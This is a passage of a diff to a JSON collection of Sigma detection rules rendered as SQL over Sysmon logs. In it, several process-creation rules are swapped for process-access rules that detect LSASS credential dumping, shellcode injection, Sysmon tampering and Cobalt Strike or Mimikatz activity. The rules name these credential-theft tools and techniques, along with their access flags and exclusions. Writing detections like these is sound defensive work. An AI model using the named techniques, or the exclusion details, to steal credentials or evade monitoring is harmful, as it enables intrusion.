((EventID = '10' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (GrantedAccess = '0x1FFFFF' AND CallTrace LIKE 'C:\\\\Windows\\\\SYSTEM32\\\\ntdll.dll+%' ESCAPE '\\' AND CallTrace LIKE '%|UNKNOWN(%' ESCAPE '\\' AND CallTrace LIKE '%)' ESCAPE '\\') AND NOT (((SourceImage LIKE 'C:\\\\Program Files\\\\%' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\Program Files (x86)\\\\%' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\Windows\\\\System32\\\\%' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\Windows\\\\SysWOW64\\\\%' ESCAPE '\\') OR (TargetImage LIKE 'C:\\\\Program Files\\\\%' ESCAPE '\\' OR TargetImage LIKE 'C:\\\\Program Files (x86)\\\\%' ESCAPE '\\' OR TargetImage LIKE 'C:\\\\Windows\\\\System32\\\\%' ESCAPE '\\' OR TargetImage LIKE 'C:\\\\Windows\\\\SysWOW64\\\\%' ESCAPE '\\')) OR (SourceImage LIKE 'C:\\\\Windows\\\\Temp\\\\asgard2-agent\\\\%' ESCAPE '\\' AND SourceImage LIKE '%\\\\thor64.exe' ESCAPE '\\') OR (SourceImage LIKE 'C:\\\\Users\\\\%' ESCAPE '\\' AND SourceImage LIKE '%\\\\AppData\\\\Local\\\\GitHubDesktop\\\\app-%' ESCAPE '\\' AND (SourceImage LIKE '%\\\\GitHubDesktop.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\resources\\\\app\\\\git\\\\usr\\\\bin\\\\sh.exe' ESCAPE '\\') AND TargetImage LIKE 'C:\\\\Users\\\\%' ESCAPE '\\' AND TargetImage LIKE '%\\\\AppData\\\\Local\\\\GitHubDesktop\\\\app-%' ESCAPE '\\') OR ((SourceImage LIKE 'C:\\\\Windows\\\\Microsoft.NET\\\\Framework\\\\v%' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\Windows\\\\Microsoft.NET\\\\Framework64\\\\v%' ESCAPE '\\') AND SourceImage LIKE '%\\\\NGenTask.exe' ESCAPE '\\' AND (TargetImage LIKE 'C:\\\\Windows\\\\Microsoft.NET\\\\Framework\\\\v%' ESCAPE '\\' OR TargetImage LIKE 'C:\\\\Windows\\\\Microsoft.NET\\\\Framework64\\\\v%' ESCAPE '\\')) OR ((SourceImage LIKE 'C:\\\\WINDOWS\\\\system32\\\\taskhostw.exe' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\Windows\\\\system32\\\\taskhost.exe' ESCAPE '\\') AND (TargetImage LIKE 'C:\\\\Windows\\\\Microsoft.NET\\\\Framework\\\\v%' ESCAPE '\\' OR TargetImage LIKE 'C:\\\\Windows\\\\Microsoft.NET\\\\Framework64\\\\v%' ESCAPE '\\') AND TargetImage LIKE '%\\\\NGenTask.exe' ESCAPE '\\') OR (SourceImage LIKE 'C:\\\\Users\\\\%' ESCAPE '\\' AND SourceImage LIKE '%\\\\AppData\\\\Local\\\\Microsoft\\\\Teams\\\\stage\\\\Teams.exe' ESCAPE '\\' AND TargetImage LIKE 'C:\\\\Users\\\\%' ESCAPE '\\' AND TargetImage LIKE '%\\\\AppData\\\\Local\\\\Microsoft\\\\Teams\\\\Update.exe' ESCAPE '\\') OR (SourceImage LIKE 'C:\\\\Users\\\\%' ESCAPE '\\' AND SourceImage LIKE '%\\\\AppData\\\\Local\\\\Microsoft\\\\Teams\\\\Update.exe' ESCAPE '\\' AND TargetImage LIKE 'C:\\\\WINDOWS\\\\SysWOW64\\\\regsvr32.exe' ESCAPE '\\') OR (SourceImage LIKE 'C:\\\\Users\\\\%' ESCAPE '\\' AND SourceImage LIKE '%\\\\AppData\\\\Local\\\\Microsoft\\\\Teams\\\\Update.exe' ESCAPE '\\' AND TargetImage LIKE '%\\\\AppData\\\\Local\\\\Microsoft\\\\Teams\\\\stage\\\\Teams.exe' ESCAPE '\\')))" ], - "filename": "proc_creation_win_sc_sdset_allow_service_changes.yml" + "filename": "proc_access_win_invoke_patchingapi.yml" }, { - "title": "Suspicious Remote Child Process From Outlook", - "id": "e212d415-0e93-435f-9e1a-f29005bb4723", - "status": "test", - "description": "Detects a suspicious child process spawning from Outlook where the image is located in a remote location (SMB/WebDav shares).", - "author": "Markus Neis, Nasreddine Bencherchali (Nextron Systems)", + "title": "SysmonEnte Usage", + "id": "d29ada0f-af45-4f27-8f32-f7b77c3dbc4e", + "status": "experimental", + "description": "Detects the use of SysmonEnte, a tool to attack the integrity of Sysmon", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.execution", - "attack.t1059", - "attack.t1202" + "attack.defense_evasion", + "attack.t1562.002" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND ParentImage LIKE '%\\\\outlook.exe' ESCAPE '\\' AND Image LIKE '\\\\\\\\\\*' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '10' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (((TargetImage LIKE 'C:\\\\Windows\\\\Sysmon64.exe' ESCAPE '\\' AND GrantedAccess = '0x1400') AND NOT (((SourceImage LIKE 'C:\\\\Program Files%' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\Windows\\\\System32\\\\%' ESCAPE '\\')) OR (SourceImage LIKE 'C:\\\\ProgramData\\\\Microsoft\\\\Windows Defender\\\\Platform\\\\%' ESCAPE '\\' AND SourceImage LIKE '%\\\\MsMpEng.exe' ESCAPE '\\'))) OR CallTrace = 'Ente'))" ], - "filename": "proc_creation_win_office_outlook_susp_child_processes_remote.yml" + "filename": "proc_access_win_hack_sysmonente.yml" }, { - "title": "UAC Bypass via Windows Firewall Snap-In Hijack", - "id": "e52cb31c-10ed-4aea-bcb7-593c9f4a315b", - "status": "experimental", - "description": "Detects attempts to bypass User Account Control (UAC) by hijacking the Microsoft Management Console (MMC) Windows Firewall snap-in", - "author": "Tim Rauch", + "title": "Malware Shellcode in Verclsid Target Process", + "id": "b7967e22-3d7e-409b-9ed5-cdae3f9243a1", + "status": "test", + "description": "Detects a process access to verclsid.exe that injects shellcode from a Microsoft Office application / VBA macro", + "author": "John Lambert (tech), Florian Roth (Nextron Systems)", "tags": [ + "attack.defense_evasion", "attack.privilege_escalation", - "attack.t1548" + "attack.t1055" ], "falsepositives": [ "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (ParentImage LIKE '%\\\\mmc.exe' ESCAPE '\\' AND ParentCommandLine LIKE '%WF.msc%' ESCAPE '\\') AND NOT (Image LIKE '%\\\\WerFault.exe' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '10' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (TargetImage LIKE '%\\\\verclsid.exe' ESCAPE '\\' AND GrantedAccess = '0x1FFFFF') AND ((CallTrace LIKE '%|UNKNOWN(%' ESCAPE '\\' AND CallTrace LIKE '%VBE7.DLL%' ESCAPE '\\') OR (SourceImage LIKE '%\\\\Microsoft Office\\\\%' ESCAPE '\\' AND CallTrace LIKE '%|UNKNOWN%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_uac_bypass_hijacking_firwall_snap_in.yml" + "filename": "proc_access_win_malware_verclsid_shellcode.yml" }, { - "title": "Invoke-Obfuscation Via Stdin", - "id": "9c14c9fa-1a63-4a64-8e57-d19280559490", - "status": "test", - "description": "Detects Obfuscated Powershell via Stdin in Scripts", - "author": "Nikita Nazarov, oscd.community", + "title": "Suspicious GrantedAccess Flags on LSASS Access", + "id": "a18dd26b-6450-46de-8c91-9659150cf088", + "status": "experimental", + "description": "Detects process access to LSASS memory with suspicious access flags", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1027", - "attack.execution", - "attack.t1059.001" + "attack.credential_access", + "attack.t1003.001", + "attack.s0002" ], "falsepositives": [ - "Unknown" + "Legitimate software such as AV and EDR" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%set%' ESCAPE '\\' AND CommandLine LIKE '%&&%' ESCAPE '\\' AND (CommandLine LIKE '%environment%' ESCAPE '\\' OR CommandLine LIKE '%invoke%' ESCAPE '\\' OR CommandLine LIKE '%input%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '10' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (TargetImage LIKE '%\\\\lsass.exe' ESCAPE '\\' AND (GrantedAccess LIKE '%30' ESCAPE '\\' OR GrantedAccess LIKE '%50' ESCAPE '\\' OR GrantedAccess LIKE '%70' ESCAPE '\\' OR GrantedAccess LIKE '%90' ESCAPE '\\' OR GrantedAccess LIKE '%B0' ESCAPE '\\' OR GrantedAccess LIKE '%D0' ESCAPE '\\' OR GrantedAccess LIKE '%F0' ESCAPE '\\' OR GrantedAccess LIKE '%18' ESCAPE '\\' OR GrantedAccess LIKE '%38' ESCAPE '\\' OR GrantedAccess LIKE '%58' ESCAPE '\\' OR GrantedAccess LIKE '%78' ESCAPE '\\' OR GrantedAccess LIKE '%98' ESCAPE '\\' OR GrantedAccess LIKE '%B8' ESCAPE '\\' OR GrantedAccess LIKE '%D8' ESCAPE '\\' OR GrantedAccess LIKE '%F8' ESCAPE '\\' OR GrantedAccess LIKE '%1A' ESCAPE '\\' OR GrantedAccess LIKE '%3A' ESCAPE '\\' OR GrantedAccess LIKE '%5A' ESCAPE '\\' OR GrantedAccess LIKE '%7A' ESCAPE '\\' OR GrantedAccess LIKE '%9A' ESCAPE '\\' OR GrantedAccess LIKE '%BA' ESCAPE '\\' OR GrantedAccess LIKE '%DA' ESCAPE '\\' OR GrantedAccess LIKE '%FA' ESCAPE '\\' OR GrantedAccess LIKE '%0x14C2' ESCAPE '\\')) AND NOT (((SourceImage LIKE 'C:\\\\WINDOWS\\\\system32\\\\taskmgr.exe' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\Program Files\\\\Malwarebytes\\\\Anti-Malware\\\\MBAMService.exe' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\PROGRAMDATA\\\\MALWAREBYTES\\\\MBAMSERVICE\\\\ctlrupdate\\\\mbupdatr.exe' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\WINDOWS\\\\system32\\\\taskhostw.exe' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\Users\\\\%\\\\AppData\\\\Local\\\\Programs\\\\Microsoft VS Code\\\\Code.exe' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\Program Files\\\\Windows Defender\\\\MsMpEng.exe' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\Windows\\\\SysWOW64\\\\msiexec.exe' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\Windows\\\\System32\\\\msiexec.exe' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\Windows\\\\System32\\\\lsass.exe' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\WINDOWS\\\\System32\\\\perfmon.exe' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\Windows\\\\System32\\\\MRT.exe' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\Program Files\\\\Cisco\\\\Cisco AnyConnect Secure Mobility Client\\\\vpnagent.exe' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\Program Files (x86)\\\\Cisco\\\\Cisco AnyConnect Secure Mobility Client\\\\vpnagent.exe' ESCAPE '\\')) OR (SourceImage LIKE 'C:\\\\ProgramData\\\\Microsoft\\\\Windows Defender\\\\%' ESCAPE '\\' AND SourceImage LIKE '%\\\\MsMpEng.exe' ESCAPE '\\') OR (CallTrace LIKE '%|C:\\\\ProgramData\\\\Microsoft\\\\Windows Defender\\\\Definition Updates\\\\{%' ESCAPE '\\' AND CallTrace LIKE '%}\\\\mpengine.dll+%' ESCAPE '\\' AND GrantedAccess = '0x1418') OR (SourceImage LIKE 'C:\\\\Program Files\\\\Microsoft Security Client\\\\MsMpEng.exe' ESCAPE '\\' AND GrantedAccess = '0x1418') OR (SourceImage LIKE 'C:\\\\ProgramData\\\\VMware\\\\VMware Tools\\\\%' ESCAPE '\\' AND SourceImage LIKE '%\\\\vmtoolsd.exe' ESCAPE '\\') OR ((SourceImage LIKE 'C:\\\\Program Files\\\\%' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\Program Files (x86)\\\\%' ESCAPE '\\') AND SourceImage LIKE '%Antivirus%' ESCAPE '\\') OR (SourceImage LIKE 'C:\\\\WINDOWS\\\\system32\\\\MRT.exe' ESCAPE '\\' AND GrantedAccess = '0x1418') OR (SourceImage LIKE 'C:\\\\Program Files\\\\Common Files\\\\McAfee\\\\MMSSHost\\\\MMSSHOST.exe' ESCAPE '\\') OR (SourceImage LIKE 'C:\\\\Windows\\\\Temp\\\\asgard2-agent\\\\%' ESCAPE '\\' AND (SourceImage LIKE '%\\\\thor64.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\thor.exe' ESCAPE '\\') AND GrantedAccess = '0x1fffff')))" ], - "filename": "proc_creation_win_hktl_invoke_obfuscation_via_stdin.yml" + "filename": "proc_access_win_susp_proc_access_lsass.yml" }, { - "title": "Security Privileges Enumeration Via Whoami.EXE", - "id": "97a80ec7-0e2f-4d05-9ef4-65760e634f6b", + "title": "Potential Svchost Memory Access", + "id": "166e9c50-8cd9-44af-815d-d1f0c0e90dde", "status": "experimental", - "description": "Detects a whoami.exe executed with the /priv command line flag instructing the tool to show all current user privileges. This is often used after a privilege escalation attempt.", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects potential access to svchost process memory such as that used by Invoke-Phantom to kill the winRM windows event logging service.", + "author": "Tim Burrell", "tags": [ - "attack.privilege_escalation", - "attack.discovery", - "attack.t1033" + "attack.defense_evasion", + "attack.t1562.002" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\whoami.exe' ESCAPE '\\' OR OriginalFileName = 'whoami.exe') AND (CommandLine LIKE '% /priv%' ESCAPE '\\' OR CommandLine LIKE '% -priv%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '10' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (TargetImage LIKE '%\\\\WINDOWS\\\\System32\\\\svchost.exe' ESCAPE '\\' AND GrantedAccess = '0x1F3FFF' AND CallTrace LIKE '%UNKNOWN%' ESCAPE '\\') AND NOT ((SourceImage LIKE 'C:\\\\Program Files\\\\Microsoft Visual Studio\\\\%' ESCAPE '\\' AND SourceImage LIKE '%\\\\MSBuild\\\\Current\\\\Bin\\\\MSBuild.exe' ESCAPE '\\' AND (CallTrace LIKE '%Microsoft.Build.ni.dll%' ESCAPE '\\' OR CallTrace LIKE '%System.ni.dll%' ESCAPE '\\'))))" ], - "filename": "proc_creation_win_whoami_priv_discovery.yml" + "filename": "proc_access_win_invoke_phantom.yml" }, { - "title": "Suspicious Cabinet File Expansion", - "id": "9f107a84-532c-41af-b005-8d12a607639f", - "status": "test", - "description": "Adversaries can use the built-in expand utility to decompress cab files as seen in recent Iranian MeteorExpress attack", - "author": "Bhabesh Raj", + "title": "LSASS Memory Dump", + "id": "5ef9853e-4d0e-4a70-846f-a9ca37d876da", + "status": "experimental", + "description": "Detects process LSASS memory dump using Mimikatz, NanoDump, Invoke-Mimikatz, Procdump or Taskmgr based on the CallTrace pointing to ntdll.dll, dbghelp.dll or dbgcore.dll for win10, server2016 and up.", + "author": "Samir Bousseaden, Michael Haag", "tags": [ - "attack.execution", - "attack.t1218" + "attack.credential_access", + "attack.t1003.001", + "attack.s0002" ], "falsepositives": [ - "System administrator Usage" + "False positives are present when looking for 0x1410. Exclusions may be required." ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\expand.exe' ESCAPE '\\' AND (CommandLine LIKE '%.cab%' ESCAPE '\\' OR CommandLine LIKE '%/F:%' ESCAPE '\\' OR CommandLine LIKE '%-F:%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\ProgramData\\\\%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\Public\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\AppData\\\\Roaming\\\\Temp\\\\%' ESCAPE '\\')) AND NOT ((ParentImage LIKE 'C:\\\\Program Files (x86)\\\\Dell\\\\UpdateService\\\\ServiceShell.exe' ESCAPE '\\' AND CommandLine LIKE '%C:\\\\ProgramData\\\\Dell\\\\UpdateService\\\\Temp\\\\%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '10' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (TargetImage LIKE '%\\\\lsass.exe' ESCAPE '\\' AND (GrantedAccess LIKE '%0x1038%' ESCAPE '\\' OR GrantedAccess LIKE '%0x1438%' ESCAPE '\\' OR GrantedAccess LIKE '%0x143a%' ESCAPE '\\') AND (CallTrace LIKE '%dbghelp.dll%' ESCAPE '\\' OR CallTrace LIKE '%dbgcore.dll%' ESCAPE '\\' OR CallTrace LIKE '%ntdll.dll%' ESCAPE '\\')) AND NOT ((CallTrace LIKE '%|C:\\\\Windows\\\\Temp\\\\asgard2-agent\\\\%' ESCAPE '\\' AND CallTrace LIKE '%\\\\thor\\\\thor64.exe+%' ESCAPE '\\' AND CallTrace LIKE '%|UNKNOWN(%' ESCAPE '\\' AND GrantedAccess = '0x103800') OR (SourceImage LIKE 'C:\\\\Windows\\\\Sysmon64.exe' ESCAPE '\\')))" ], - "filename": "proc_creation_win_expand_cabinet_files.yml" + "filename": "proc_access_win_lsass_memdump.yml" }, { - "title": "Suspicious Process Created Via Wmic.EXE", - "id": "3c89a1e8-0fba-449e-8f1b-8409d6267ec8", - "status": "test", - "description": "Detects WMIC executing \"process call create\" with suspicious calls to processes such as \"rundll32\", \"regsrv32\", etc.", - "author": "Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)", + "title": "CMSTP Execution Process Access", + "id": "3b4b232a-af90-427c-a22f-30b0c0837b95", + "status": "stable", + "description": "Detects various indicators of Microsoft Connection Manager Profile Installer execution", + "author": "Nik Seetharaman", "tags": [ + "attack.defense_evasion", + "attack.t1218.003", "attack.execution", - "attack.t1047" + "attack.t1559.001", + "attack.g0069", + "attack.g0080", + "car.2019-04-001" ], "falsepositives": [ - "Unknown" + "Legitimate CMSTP use (unlikely in modern enterprise environments)" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%process %' ESCAPE '\\' AND CommandLine LIKE '%call %' ESCAPE '\\' AND CommandLine LIKE '%create %' ESCAPE '\\' AND (CommandLine LIKE '%rundll32%' ESCAPE '\\' OR CommandLine LIKE '%bitsadmin%' ESCAPE '\\' OR CommandLine LIKE '%regsvr32%' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe /c %' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe /k %' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe /r %' ESCAPE '\\' OR CommandLine LIKE '%cmd /c %' ESCAPE '\\' OR CommandLine LIKE '%cmd /k %' ESCAPE '\\' OR CommandLine LIKE '%cmd /r %' ESCAPE '\\' OR CommandLine LIKE '%powershell%' ESCAPE '\\' OR CommandLine LIKE '%pwsh%' ESCAPE '\\' OR CommandLine LIKE '%certutil%' ESCAPE '\\' OR CommandLine LIKE '%cscript%' ESCAPE '\\' OR CommandLine LIKE '%wscript%' ESCAPE '\\' OR CommandLine LIKE '%mshta%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Windows\\\\Temp\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\AppData\\\\Local\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\%temp\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\%tmp\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\%ProgramData\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\%appdata\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\%comspec\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\%localappdata\\%%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '10' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CallTrace LIKE '%cmlua.dll%' ESCAPE '\\')" ], - "filename": "proc_creation_win_wmic_susp_process_creation.yml" + "filename": "proc_access_win_cmstp_execution_by_access.yml" }, { - "title": "Suspicious TSCON Start as SYSTEM", - "id": "9847f263-4a81-424f-970c-875dab15b79b", - "status": "experimental", - "description": "Detects a tscon.exe start as LOCAL SYSTEM", - "author": "Florian Roth (Nextron Systems)", + "title": "SVCHOST Credential Dump", + "id": "174afcfa-6e40-4ae9-af64-496546389294", + "status": "test", + "description": "Detects when a process, such as mimikatz, accesses the memory of svchost to dump credentials", + "author": "Florent Labouyrie", "tags": [ - "attack.command_and_control", - "attack.t1219" + "attack.t1548" ], "falsepositives": [ - "Unknown" + "Non identified legit exectubale" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (User LIKE '%AUTHORI%' ESCAPE '\\' OR User LIKE '%AUTORI%' ESCAPE '\\') AND Image LIKE '%\\\\tscon.exe' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '10' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (TargetImage LIKE '%\\\\svchost.exe' ESCAPE '\\' AND GrantedAccess = '0x143a') AND NOT ((SourceImage LIKE '%\\\\services.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\msiexec.exe' ESCAPE '\\')))" ], - "filename": "proc_creation_win_tscon_localsystem.yml" + "filename": "proc_access_win_svchost_cred_dump.yml" }, { - "title": "DLL Execution Via Register-cimprovider.exe", - "id": "a2910908-e86f-4687-aeba-76a5f996e652", - "status": "test", - "description": "Detects using register-cimprovider.exe to execute arbitrary dll file.", - "author": "Ivan Dyachkov, Yulia Fomina, oscd.community", + "title": "Credential Dumping by LaZagne", + "id": "4b9a8556-99c4-470b-a40c-9c8d02c77ed0", + "status": "stable", + "description": "Detects LSASS process access by LaZagne for credential dumping.", + "author": "Bhabesh Raj, Jonhnathan Ribeiro", "tags": [ - "attack.defense_evasion", - "attack.t1574" + "attack.credential_access", + "attack.t1003.001", + "attack.s0349" ], "falsepositives": [ "Unknown" ], - "level": "medium", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\register-cimprovider.exe' ESCAPE '\\' AND CommandLine LIKE '%-path%' ESCAPE '\\' AND CommandLine LIKE '%dll%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '10' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetImage LIKE '%\\\\lsass.exe' ESCAPE '\\' AND CallTrace LIKE '%C:\\\\Windows\\\\SYSTEM32\\\\ntdll.dll+%' ESCAPE '\\' AND CallTrace LIKE '%|C:\\\\Windows\\\\System32\\\\KERNELBASE.dll+%' ESCAPE '\\' AND CallTrace LIKE '%\\_ctypes.pyd+%' ESCAPE '\\' AND CallTrace LIKE '%python27.dll+%' ESCAPE '\\' AND GrantedAccess = '0x1FFFFF')" ], - "filename": "proc_creation_win_registry_cimprovider_dll_load.yml" + "filename": "proc_access_win_lazagne_cred_dump_lsass_access.yml" }, { - "title": "Download Arbitrary Files Via MSOHTMED.EXE", - "id": "459f2f98-397b-4a4a-9f47-6a5ec2f1c69d", + "title": "Potential Shellcode Injection", + "id": "250ae82f-736e-4844-a68b-0b5e8cc887da", "status": "experimental", - "description": "Detects usage of \"MSOHTMED\" to download arbitrary files", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects potential shellcode injection used by tools such as Metasploit's migrate and Empire's psinject", + "author": "Bhabesh Raj", "tags": [ "attack.defense_evasion", - "attack.execution", - "attack.t1218" + "attack.privilege_escalation", + "attack.t1055" ], "falsepositives": [ "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\MSOHTMED.exe' ESCAPE '\\' OR OriginalFileName = 'MsoHtmEd.exe') AND (CommandLine LIKE '%http://%' ESCAPE '\\' OR CommandLine LIKE '%https://%' ESCAPE '\\' OR CommandLine LIKE '%ftp://%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '10' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (GrantedAccess IN ('0x147a', '0x1f3fff') AND CallTrace LIKE '%UNKNOWN%' ESCAPE '\\') AND NOT (((SourceImage LIKE 'C:\\\\Program Files\\\\Dell\\\\%' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\Program Files (x86)\\\\Dell\\\\%' ESCAPE '\\') AND (TargetImage LIKE 'C:\\\\Program Files\\\\Dell\\\\%' ESCAPE '\\' OR TargetImage LIKE 'C:\\\\Program Files (x86)\\\\Dell\\\\%' ESCAPE '\\') AND GrantedAccess = '0x1F3FFF' AND CallTrace LIKE 'C:\\\\Windows\\\\System32\\\\ntdll.dll%' ESCAPE '\\') OR (SourceImage LIKE 'C:\\\\Program Files (x86)\\\\Dell\\\\UpdateService\\\\ServiceShell.exe' ESCAPE '\\' AND TargetImage LIKE 'C:\\\\Windows\\\\Explorer.EXE' ESCAPE '\\' AND GrantedAccess = '0x1F3FFF' AND CallTrace LIKE 'C:\\\\Windows\\\\System32\\\\ntdll.dll%' ESCAPE '\\') OR ((SourceImage LIKE 'C:\\\\Program Files\\\\Microsoft Visual Studio\\\\2022\\\\Community\\\\Common7\\\\IDE\\\\PerfWatson2.exe' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\Program Files (x86)\\\\Microsoft Visual Studio\\\\2019\\\\Community\\\\Common7\\\\IDE\\\\PerfWatson2.exe' ESCAPE '\\') AND (TargetImage LIKE 'C:\\\\Program Files\\\\Microsoft Visual Studio\\\\2022\\\\Community\\\\Common7\\\\IDE\\\\devenv.exe' ESCAPE '\\' OR TargetImage LIKE 'C:\\\\Program Files (x86)\\\\Microsoft Visual Studio\\\\2019\\\\Community\\\\Common7\\\\IDE\\\\devenv.exe' ESCAPE '\\') AND CallTrace LIKE 'C:\\\\Windows\\\\System32\\\\ntdll.dll%' ESCAPE '\\') OR (SourceImage LIKE 'C:\\\\Program Files\\\\Microsoft Visual Studio\\\\%' ESCAPE '\\' AND SourceImage LIKE '%\\\\MSBuild\\\\Current\\\\Bin\\\\MSBuild.exe' ESCAPE '\\' AND TargetImage LIKE 'C:\\\\Program Files\\\\Dell\\\\DellDataVault\\\\DDVDataCollector.exe' ESCAPE '\\') OR (SourceImage LIKE 'C:\\\\Windows\\\\System32\\\\Wbem\\\\Wmiprvse.exe' ESCAPE '\\' AND TargetImage LIKE 'C:\\\\Windows\\\\system32\\\\lsass.exe' ESCAPE '\\' AND CallTrace LIKE 'C:\\\\Windows\\\\SYSTEM32\\\\ntdll.dll%' ESCAPE '\\' AND CallTrace LIKE '%\\\\System.ni.dll+%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_lolbin_msohtmed_download.yml" + "filename": "proc_access_win_shellcode_inject_msf_empire.yml" }, { - "title": "Operator Bloopers Cobalt Strike Modules", - "id": "4f154fb6-27d1-4813-a759-78b93e0b9c48", + "title": "LSASS Access from Program in Suspicious Folder", + "id": "fa34b441-961a-42fa-a100-ecc28c886725", "status": "experimental", - "description": "Detects Cobalt Strike module/commands accidentally entered in CMD shell", - "author": "_pete_0, TheDFIRReport", + "description": "Detects process access to LSASS memory with suspicious access flags and from a suspicious folder", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.execution", - "attack.t1059.003" + "attack.credential_access", + "attack.t1003.001", + "attack.s0002" ], "falsepositives": [ - "Unknown" + "Updaters and installers are typical false positives. Apply custom filters depending on your environment" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (OriginalFileName = 'Cmd.Exe' OR Image LIKE '%\\\\cmd.exe' ESCAPE '\\') AND (CommandLine LIKE '%Invoke-UserHunter%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-ShareFinder%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Kerberoast%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-SMBAutoBrute%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Nightmare%' ESCAPE '\\' OR CommandLine LIKE '%zerologon%' ESCAPE '\\' OR CommandLine LIKE '%av\\_query%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '10' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (TargetImage LIKE '%\\\\lsass.exe' ESCAPE '\\' AND (GrantedAccess LIKE '%10' ESCAPE '\\' OR GrantedAccess LIKE '%30' ESCAPE '\\' OR GrantedAccess LIKE '%50' ESCAPE '\\' OR GrantedAccess LIKE '%70' ESCAPE '\\' OR GrantedAccess LIKE '%90' ESCAPE '\\' OR GrantedAccess LIKE '%B0' ESCAPE '\\' OR GrantedAccess LIKE '%D0' ESCAPE 